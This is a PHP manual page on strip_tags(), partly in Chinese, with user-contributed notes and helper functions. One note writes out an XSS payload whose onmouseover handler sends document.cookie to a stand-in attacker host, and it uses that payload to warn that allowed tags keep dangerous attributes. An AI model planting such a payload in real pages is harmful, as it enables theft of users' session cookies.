strip_tags

(PHP 4, PHP 5, PHP 7, PHP 8)

strip_tags — 从字符串中去除 HTML 和 PHP 标记

说明

strip_tags ( string $str , string $allowable_tags = ? ) : string

该函数尝试返回给定的字符串 str 去除空字符、HTML 和 PHP 标记后的结果。它使用与函数 fgetss() 一样的机制去除标记。

参数

str: 输入字符串。
allowable_tags: 使用可选的第二个参数指定不被去除的字符列表。

Note:
HTML 注释和 PHP 标签也会被去除。这里是硬编码处理的，所以无法通过 allowable_tags 参数进行改变。

Note:
In PHP 5.3.4 and later, self-closing XHTML tags are ignored and only non-self-closing tags should be used in allowable_tags. For example, to allow both <br> and <br/>, you should use:

<?php strip_tags($input, '<br>'); ?>

返回值

返回处理后的字符串。

更新日志

版本	说明
5.3.4	strip_tags() ignores self-closing XHTML tags in `allowable_tags`.
5.0.0	strip_tags() 变为二进制安全的。

范例

Example #1 strip_tags() 范例


<?php
$text = '<p>Test paragraph.</p><!-- Comment --> <a href="#fragment">Other text</a>';
echo strip_tags($text);
echo "\n";

// 允许 <p> 和 <a>
echo strip_tags($text, '<p><a>');
?>

以上例程会输出：

Test paragraph. Other text
<p>Test paragraph.</p> <a href="#fragment">Other text</a>

注释

Warning

由于 strip_tags() 无法实际验证 HTML，不完整或者破损标签将导致更多的数据被删除。

Warning

该函数不会修改 allowable_tags 参数中指定的允许标记的任何属性，包括 style 和 onmouseover 属性，用户可能会在提交的内容中恶意滥用这些属性，从而展示给其他用户。

Note:
输入 HTML 标签名字如果大于 1023 字节(bytes)将会被认为是无效的，无论 allowable_tags 参数是怎样的。

参见

htmlspecialchars() - 将特殊字符转换为 HTML 实体

User Contributed Notes

abe 24-May-2021 05:30


Note, strip_tags will remove anything looking like a tag - not just tags - i.e. if you have tags in attributes then they may be removed too,



e.g. 



    <?php

    $test='<div a="abc <b>def</b> hij" b="1">x<b>y</b>z</div>';

    $echo strip_tags($test, "<div><b>");



will result in 



   <div a="abc bdef/b hij" b="1">x<b>y</b>z</div>

roger dot keulen at vaimo dot com 09-Sep-2019 12:01


https://bugs.php.net/bug.php?id=78346



After upgrading from v7.3.3 to v7.3.7 it appears nested "php tags" inside a string are no longer being stripped correctly by strip_tags().



This is still working in v7.3.3, v7.2 & v7.1. I've added a simple test below.



Test script:

---------------

<?php

$str = '<?= \'<?= 1 ?>\' ?>2';

var_dump(strip_tags($str));



Expected result:

----------------

string(1) "2"



Actual result:

--------------

string(5) "' ?>2"

D Mo 16-Apr-2018 12:23


When process a bulk of strings, the stripping of tags including their content on basis of regular expression is very slow. This function may help:



<?php

/**

 * Removes passed tags with their content.

 *

 * @param array $tagsToRemove List of tags to remove

 * @param $haystack String to cleanup

 * @return string

 */

function removeTagsWithTheirContent(array $tagsToRemove, $haystack)

{

    $currTag = '';

    $currPos = false;



    $initSearch = function (&$currTag, &$currPos, $tagsToRemove, $haystack) {

        $currTag = '';

        $currPos = false;

        foreach ($tagsToRemove as $tag) {

            $tempPos = stripos($haystack, '<'.$tag);

            if ($tempPos !== false && ($currPos === false || $tempPos < $currPos)) {

                $currPos = $tempPos;

                $currTag = $tag;

            }

        }

    };



    $substri_count = function ($haystack, $needle, $offset, $length) {

        $haystack = strtolower($haystack);

        return substr_count($haystack, $needle, $offset, $length);

    };



    $initSearch($currTag, $currPos, $tagsToRemove, $haystack);

    while ($currPos !== false) {

        $minTagLength = strlen($currTag) + 2;

        $tempPos = $currPos + $minTagLength;

        $tagEndPos = stripos($haystack, '</'.$currTag.'>', $tempPos);

        // process nested tags

        if ($tagEndPos !== false) {

            $nestedCount = $substri_count($haystack, '<' . $currTag, $tempPos, $tagEndPos - $tempPos);



            for ($i = $nestedCount; $i > 0; $i--) {

                $lastValidPos = $tagEndPos;

                $tagEndPos = stripos($haystack, '</' . $currTag . '>', $tagEndPos + 1);

                if ($tagEndPos === false) {

                    $tagEndPos = $lastValidPos;

                    break;

                }

            }

        }



        if ($tagEndPos === false) {

            // invalid html, end search for current tag

            $tagsToRemove = array_diff($tagsToRemove, [$currTag]);

        } else {

            // remove current tag with its content

            $haystack = substr($haystack, 0, $currPos)

                // get string after "</$tag>"

                .substr($haystack, $tagEndPos + strlen($currTag) + 3);

        }



        $initSearch($currTag, $currPos, $tagsToRemove, $haystack);

    }



    return $haystack;

}

?>

Anonymous 05-Apr-2017 12:05


Just bzplan's function with the option to choose what tags are replaced for



function rip_tags($string, $rep = ' ') { 

    

    // ----- remove HTML TAGs ----- 

    $string = preg_replace ('/<[^>]*>/', $rep, $string); 

    

    // ----- remove control characters ----- 

    $string = str_replace("\r", '', $string);    // --- replace with empty space

    $string = str_replace("\n", $rep, $string);   // --- replace with space

    $string = str_replace("\t", $rep, $string);   // --- replace with space

    

    // ----- remove multiple spaces ----- 

    $string = trim(preg_replace('/ {2,}/', $rep, $string));

    

    return $string; 



}

stever at starburstpublishing dot com dot au 19-Sep-2016 06:09


Since strip_tags does not remove attributes and thus creates a potential XSS security hole, here is a small function I wrote to allow only specific tags with specific attributes and strip all other tags and attributes.



If you only allow formatting tags such as b, i, and p, and styling attributes such as class, id and style, this will strip all javascript including event triggers in formatting tags.



Note that allowing anchor tags or href attributes opens another potential security hole that this solution won't protect against. You'll need more comprehensive protection if you plan to allow links in your text.



<?php

function stripUnwantedTagsAndAttrs($html_str){

  $xml = new DOMDocument();

//Suppress warnings: proper error handling is beyond scope of example

  libxml_use_internal_errors(true);

//List the tags you want to allow here, NOTE you MUST allow html and body otherwise entire string will be cleared

  $allowed_tags = array("html", "body", "b", "br", "em", "hr", "i", "li", "ol", "p", "s", "span", "table", "tr", "td", "u", "ul");

//List the attributes you want to allow here

  $allowed_attrs = array ("class", "id", "style");

  if (!strlen($html_str)){return false;}

  if ($xml->loadHTML($html_str, LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD)){

    foreach ($xml->getElementsByTagName("*") as $tag){

      if (!in_array($tag->tagName, $allowed_tags)){

        $tag->parentNode->removeChild($tag);

      }else{

        foreach ($tag->attributes as $attr){

          if (!in_array($attr->nodeName, $allowed_attrs)){

            $tag->removeAttribute($attr->nodeName);

          }

        }

      }

    }

  }

  return $xml->saveHTML();

}

?>

Trititaty 14-Dec-2015 09:28


Features:

* allowable tags (as in strip_tags),

* optional stripping attributes of the allowable tags,

* optional comment preserving,

* deleting broken and unclosed tags and comments,

* optional callback function call for every piece processed allowing for flexible replacements.



<?php

function better_strip_tags( $str, $allowable_tags = '', $strip_attrs = false, $preserve_comments = false, callable $callback = null ) {

  $allowable_tags = array_map( 'strtolower', array_filter( // lowercase

      preg_split( '/(?:>|^)\\s*(?:<|$)/', $allowable_tags, -1, PREG_SPLIT_NO_EMPTY ), // get tag names

      function( $tag ) { return preg_match( '/^[a-z][a-z0-9_]*$/i', $tag ); } // filter broken

  ) );

  $comments_and_stuff = preg_split( '/(<!--.*?(?:-->|$))/', $str, -1, PREG_SPLIT_DELIM_CAPTURE );

  foreach ( $comments_and_stuff as $i => $comment_or_stuff ) {

    if ( $i % 2 ) { // html comment

      if ( !( $preserve_comments && preg_match( '/<!--.*?-->/', $comment_or_stuff ) ) ) {

        $comments_and_stuff[$i] = '';

      }

    } else { // stuff between comments

      $tags_and_text = preg_split( "/(<(?:[^>\"']++|\"[^\"]*+(?:\"|$)|'[^']*+(?:'|$))*(?:>|$))/", $comment_or_stuff, -1, PREG_SPLIT_DELIM_CAPTURE );

      foreach ( $tags_and_text as $j => $tag_or_text ) {

        $is_broken = false;

        $is_allowable = true;

        $result = $tag_or_text;

        if ( $j % 2 ) { // tag

          if ( preg_match( "%^(</?)([a-z][a-z0-9_]*)\\b(?:[^>\"'/]++|/+?|\"[^\"]*\"|'[^']*')*?(/?>)%i", $tag_or_text, $matches ) ) {

            $tag = strtolower( $matches[2] );

            if ( in_array( $tag, $allowable_tags ) ) {

              if ( $strip_attrs ) {

                $opening = $matches[1];

                $closing = ( $opening === '</' ) ? '>' : $closing;

                $result = $opening . $tag . $closing;

              }

            } else {

              $is_allowable = false;

              $result = '';

            }

          } else {

            $is_broken = true;

            $result = '';

          }

        } else { // text

          $tag = false;

        }

        if ( !$is_broken && isset( $callback ) ) {

          // allow result modification

          call_user_func_array( $callback, array( &$result, $tag_or_text, $tag, $is_allowable ) );

        }

        $tags_and_text[$j] = $result;

      }

      $comments_and_stuff[$i] = implode( '', $tags_and_text );

    }

  }

  $str = implode( '', $comments_and_stuff );

  return $str;

}

?>



Callback arguments:

* &$result: contains text to be placed insted of original piece (e.g. empty string for forbidden tags), it can be changed;

* $tag_or_text: original piece of text or a tag (see below);

* $tag: false for text between tags, lowercase tag name for tags;

* $is_allowable: boolean telling if a tag isn't allowed (to avoid double checking), always true for text between tags

Callback function isn't called for comments and broken tags.



Caution: the function doesn't fully validate tags (the more so HTML itself), it just force strips those obviously broken (in addition to stripping forbidden tags). If you want to get valid tags then use strip_attrs option, though it doesn't guarantee tags are balanced or used in the appropriate context. For complex logic consider using DOM parser.

Dr. Gianluigi "Zane" Zanettini 22-Oct-2015 07:52


A word of caution. strip_tags() can actually be used for input validation as long as you remove ANY tag. As soon as you accept a single tag (2nd parameter), you are opening up a security hole such as this:



<acceptedTag onLoad="javascript:malicious()" />



Plus: regexing away attributes or code block is really not the right solution. For effective input validation when using strip_tags() with even a single tag accepted, http://htmlpurifier.org/ is the way to go.

doug at exploittheweb dot com 11-Aug-2015 10:17


"5.3.4    strip_tags() no longer strips self-closing XHTML tags unless the self-closing XHTML tag is also given in allowable_tags."



This is poorly worded.



The above seems to be saying that, since 5.3.4, if you don't specify "<br/>" in allowable_tags then "<br/>" will not be stripped... but that's not actually what they're trying to say.



What it means is, in versions prior to 5.3.4, it "strips self-closing XHTML tags unless the self-closing XHTML tag is also given in allowable_tags", and that since 5.3.4 this is no longer the case.



So what reads as "no longer strips self-closing tags (unless the self-closing XHTML tag is also given in allowable_tags)" is actually saying "no longer (strips self-closing tags unless the self-closing XHTML tag is also given in allowable_tags)".



i.e.



pre-5.3.4: strip_tags('Hello World<br><br/>','<br>') => 'Hello World<br>' // strips <br/> because it wasn't explicitly specified in allowable_tags



5.3.4 and later: strip_tags('Hello World<br><br/>','<br>') => 'Hello World<br><br/>' // does not strip <br/> because PHP matches it with <br> in allowable_tags

valentin dot boschatel at evalandgo dot com 26-May-2015 09:41


Hi,



I havee a problem with this function. I want use this symbol in my text ( < ), but it doesn't work because I added character stuck to that symbol.



Exemple :

<?php

$test = '<p><span style="color: #ff0000; background-color: #000000;">Complex</span> <span style="font-family: impact,chicago;">text <50% </span> <a href="http://exempledomain.com/"><em>with</em></a> <span style="font-size: 36pt;"><strong>tags</strong></span></p>';



echo strip_tags('$test');

// Outputs : Complex text

?>



I made a function for this :



Function: 

<?php

function strip_tags_review($str, $allowable_tags = '') {



    preg_match_all('/<(.+?)[\s]*\/?[\s]*>/si', trim($allowable_tags), $tags);

    $tags = array_unique($tags[1]);



    if(is_array($tags) AND count($tags) > 0) {

        $pattern = '@<(?!(?:' . implode('|', $tags) . ')\b)(\w+)\b.*?>(.*?)</\1>@i';

    }

    else {

        $pattern = '@<(\w+)\b.*?>(.*?)</\1>@i';

    }



    $str = preg_replace($pattern, '$2', $str);

    return preg_match($pattern, $str) ? strip_tags_review($str, $allowable_tags) : $str;

}



echo strip_tags_review($test);

// Outputs: Complex text <50%  with tags



echo strip_tags_review($test, '<a>');

// Outputs: Complex text <50%  <a href="http://exempledomain.com">with</a> tags

?>

fernando at zauber dot es 10-Nov-2014 11:45


As you probably know, the native function strip_tags don't work very well with malformed HTML when you use the allowed tags parameter.

This is a very simple but effective function to remove html tags. It takes a list (array) of allowed tags as second parameter:



<?php

function flame_strip_tags($html, $allowed_tags=array()) {

  $allowed_tags=array_map(strtolower,$allowed_tags);

  $rhtml=preg_replace_callback('/<\/?([^>\s]+)[^>]*>/i', function ($matches) use (&$allowed_tags) {        

    return in_array(strtolower($matches[1]),$allowed_tags)?$matches[0]:'';

  },$html);

  return $rhtml;

}

?>



The function works reasonably well with invalid/bad formatted HTML.



Use:



<?php

$allowed_tags=array("h1","a");

$html=<<<EOD

<h1>Example</h1>

<dt><a href='/manual/en/getting-started.php'>Getting Started</a></dt>

    <dd><a href='/manual/en/introduction.php'>Introduction</a></dd>

    <dd><a href='/manual/en/tutorial.php'>A simple tutorial</a></dd>

<dt><a href='/manual/en/langref.php'>Language Reference</a></dt>

    <dd><a href='/manual/en/language.basic-syntax.php'>Basic syntax</a></dd>

    <dd><a href='/manual/en/reserved.interfaces.php'>Predefined Interfaces and Classes</a></dd>

</dl>

EOD;

echo flame_strip_tags($html,$allowed_tags);

?>



The output will be:



<h1>Example</h1>

<a href='/manual/en/getting-started.php'>Getting Started</a>

<a href='/manual/en/introduction.php'>Introduction</a>

<a href='/manual/en/tutorial.php'>A simple tutorial</a>

<a href='/manual/en/langref.php'>Language Reference</a>

<a href='/manual/en/language.basic-syntax.php'>Basic syntax</a>

<a href='/manual/en/reserved.interfaces.php'>Predefined Interfaces and Classes</a>

bnt dot gloria at outlook dot com 10-Jul-2014 03:52


With allowable_tags, strip-tags is not safe.



<?php



$str= "<p onmouseover=\"window.location='http://www.theBad.com/?cookie='+document.cookie;\"> don't mouseover </p>";

$str= strip_tags($str, '<p>');

echo $str; // DISPLAY: <p onmouseover=\"window.location='http://www.theBad.com/?cookie='+document.cookie;\"> don't mouseover </p>";



?>

obeyer at popsugar dot com 10-Jan-2014 11:50


actually, for PHP 5.4.19, if you want to add line breaks <br> to allowable tags, you should use "<br>". Both <br/> and <br /> in allowable tags won't do anything, and line breaks will be stripped

bzplan at web dot de 07-Oct-2012 07:57


a HTML code like this: 



<?php

$html = '

<div>

<p style="color:blue;">color is blue</p><p>size is <span style="font-size:200%;">huge</span></p>

<p>material is wood</p>

</div>

'; 

?>



with <?php $str = strip_tags($html); ?>

... the result is:



$str = 'color is bluesize is huge

material is wood'; 



notice: the words 'blue' and 'size' grow together :( 

and line-breaks are still in new string $str



if you need a space between the words (and without line-break) 

use my function: <?php $str = rip_tags($html); ?>

... the result is:



$str = 'color is blue size is huge material is wood'; 



the function: 



<?php

// -------------------------------------------------------------- 



function rip_tags($string) { 

    

    // ----- remove HTML TAGs ----- 

    $string = preg_replace ('/<[^>]*>/', ' ', $string); 

    

    // ----- remove control characters ----- 

    $string = str_replace("\r", '', $string);    // --- replace with empty space

    $string = str_replace("\n", ' ', $string);   // --- replace with space

    $string = str_replace("\t", ' ', $string);   // --- replace with space

    

    // ----- remove multiple spaces ----- 

    $string = trim(preg_replace('/ {2,}/', ' ', $string));

    

    return $string; 



}



// -------------------------------------------------------------- 

?>



the KEY is the regex pattern: '/<[^>]*>/'

instead of strip_tags() 

... then remove control characters and multiple spaces

:)

tom at cowin dot us 27-Aug-2010 07:04


With most web based user input of more than a line of text, it seems I get 90% 'paste from Word'. I've developed this fn over time to try to strip all of this cruft out. A few things I do here are application specific, but if it helps you - great, if you can improve on it or have a better way - please - post it... 





<?php





    function strip_word_html($text, $allowed_tags = '<b><i><sup><sub><em><strong><u><br>')


    {


        mb_regex_encoding('UTF-8');


        //replace MS special characters first


        $search = array('/&lsquo;/u', '/&rsquo;/u', '/&ldquo;/u', '/&rdquo;/u', '/&mdash;/u');


        $replace = array('\'', '\'', '"', '"', '-');


        $text = preg_replace($search, $replace, $text);


        //make sure _all_ html entities are converted to the plain ascii equivalents - it appears


        //in some MS headers, some html entities are encoded and some aren't


        $text = html_entity_decode($text, ENT_QUOTES, 'UTF-8');


        //try to strip out any C style comments first, since these, embedded in html comments, seem to


        //prevent strip_tags from removing html comments (MS Word introduced combination)


        if(mb_stripos($text, '/*') !== FALSE){


            $text = mb_eregi_replace('#/\*.*?\*/#s', '', $text, 'm');


        }


        //introduce a space into any arithmetic expressions that could be caught by strip_tags so that they won't be


        //'<1' becomes '< 1'(note: somewhat application specific)


        $text = preg_replace(array('/<([0-9]+)/'), array('< $1'), $text);


        $text = strip_tags($text, $allowed_tags);


        //eliminate extraneous whitespace from start and end of line, or anywhere there are two or more spaces, convert it to one


        $text = preg_replace(array('/^\s\s+/', '/\s\s+$/', '/\s\s+/u'), array('', '', ' '), $text);


        //strip out inline css and simplify style tags


        $search = array('#<(strong|b)[^>]*>(.*?)</(strong|b)>#isu', '#<(em|i)[^>]*>(.*?)</(em|i)>#isu', '#<u[^>]*>(.*?)</u>#isu');


        $replace = array('<b>$2</b>', '<i>$2</i>', '<u>$1</u>');


        $text = preg_replace($search, $replace, $text);


        //on some of the ?newer MS Word exports, where you get conditionals of the form 'if gte mso 9', etc., it appears


        //that whatever is in one of the html comments prevents strip_tags from eradicating the html comment that contains


        //some MS Style Definitions - this last bit gets rid of any leftover comments */


        $num_matches = preg_match_all("/\<!--/u", $text, $matches);


        if($num_matches){


              $text = preg_replace('/\<!--(.)*--\>/isu', '', $text);


        }


        return $text;


    }


?>

CEO at CarPool2Camp dot org 17-Feb-2009 11:10


Note the different outputs from different versions of the same tag:





<?php // striptags.php


$data = '<br>Each<br/>New<br />Line';


$new  = strip_tags($data, '<br>');


var_dump($new);  // OUTPUTS string(21) "<br>EachNew<br />Line"





<?php // striptags.php


$data = '<br>Each<br/>New<br />Line';


$new  = strip_tags($data, '<br/>');


var_dump($new); // OUTPUTS string(16) "Each<br/>NewLine"





<?php // striptags.php


$data = '<br>Each<br/>New<br />Line';


$new  = strip_tags($data, '<br />');


var_dump($new); // OUTPUTS string(11) "EachNewLine"


?>

mariusz.tarnaski at wp dot pl 12-Nov-2008 08:05


Hi. I made a function that removes the HTML tags along with their contents:





Function:


<?php


function strip_tags_content($text, $tags = '', $invert = FALSE) {





  preg_match_all('/<(.+?)[\s]*\/?[\s]*>/si', trim($tags), $tags);


  $tags = array_unique($tags[1]);


    


  if(is_array($tags) AND count($tags) > 0) {


    if($invert == FALSE) {


      return preg_replace('@<(?!(?:'. implode('|', $tags) .')\b)(\w+)\b.*?>.*?</\1>@si', '', $text);


    }


    else {


      return preg_replace('@<('. implode('|', $tags) .')\b.*?>.*?</\1>@si', '', $text);


    }


  }


  elseif($invert == FALSE) {


    return preg_replace('@<(\w+)\b.*?>.*?</\1>@si', '', $text);


  }


  return $text;


}


?>





Sample text:


$text = '<b>sample</b> text with <div>tags</div>';





Result for strip_tags($text):


sample text with tags





Result for strip_tags_content($text):


 text with 





Result for strip_tags_content($text, '<b>'):


<b>sample</b> text with 





Result for strip_tags_content($text, '<b>', TRUE);


 text with <div>tags</div>





I hope that someone is useful :)

cesar at nixar dot org 07-Mar-2006 11:44


Here is a recursive function for strip_tags like the one showed in the stripslashes manual page.



<?php

function strip_tags_deep($value)

{

  return is_array($value) ?

    array_map('strip_tags_deep', $value) :

    strip_tags($value);

}



// Example

$array = array('<b>Foo</b>', '<i>Bar</i>', array('<b>Foo</b>', '<i>Bar</i>'));

$array = strip_tags_deep($array);



// Output

print_r($array);

?>